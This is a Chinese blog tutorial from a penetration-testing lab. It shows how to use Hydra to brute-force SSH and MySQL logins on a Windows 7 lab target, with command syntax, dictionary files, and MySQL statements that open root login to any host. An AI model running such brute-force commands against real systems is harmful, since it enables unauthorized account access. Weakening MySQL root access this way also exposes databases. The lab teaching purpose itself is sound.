渗透测试-暴力破解之hydra

本文介绍了暴力破解工具Hydra的基本使用,特别是在Kali Linux中针对SSH和MySQL服务进行爆破的步骤。通过修改MySQL的远程登录配置,允许从任何主机连接,成功利用Hydra获取了Windows 7靶机的数据库用户名和密码,实现了数据库的登录和信息查询。
摘要由CSDN通过智能技术生成

暴力破解之hydra

前言

一、什么是暴力破解

暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。

二、暴力破解枚举之hydra

1.hydra相关语法

kali自带的hydra
hydra -l root -p root 172.26.2.36 ssh
-l 指定用户名
-L 指定用户名字典
-p 指定密码
-P 指定密码字典
-C 使用冒号分隔,root:root
-M 指定目标列表文件
-f 在找到第一队登录名和密码时停止

2.利用hydra进行爆破获取用户信息

打开window7靶机的mysql
在这里插入图片描述
这里我自定义爆破字典进行爆破
自定义用户ok.txt,密码字典cmd.txt
在kali中打开hydra输入
hydra -L cmd.txt -P ok.txt 192.168.222.97 mysql -f
爆破win7的数据库用户名和密码
用vim ok.txt进行编译即可
在这里插入图片描述
爆破成功,出现用户名和密码,进行登录连接数据库
输入mysql -h 192.168.222.109 -u 账号 -p 密码
登录成功,可以利用数据库查询得到可利用的信息。

这里可能会出现hydra连接不上win7的mysql,解决方法如下,打开数据库进行修改一些配置信息
(1)利用kali中的hydra连接外机的数据库时,有时连接不的解决方法是:

改表法。可能是你的帐号不允许从远程登陆,只能在localhost。这个时候只要在localhost的那台电脑,登入mysql后,更改 “mysql” 数据库里的 “user” 表里的 “host” 项,从"localhost"改称"%"

mysql -u root -pvmwaremysql>use mysql;
mysql>update user set host = ‘%’ where user = ‘root’;
mysql>select host, user from user;
flush privileges;

总结

本次实验简单介绍了暴力破解工具hydra的简单使用,学会对hydra关键语句的使用,利用语句和字典对数据库,ssh进行爆破获取用户信息。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值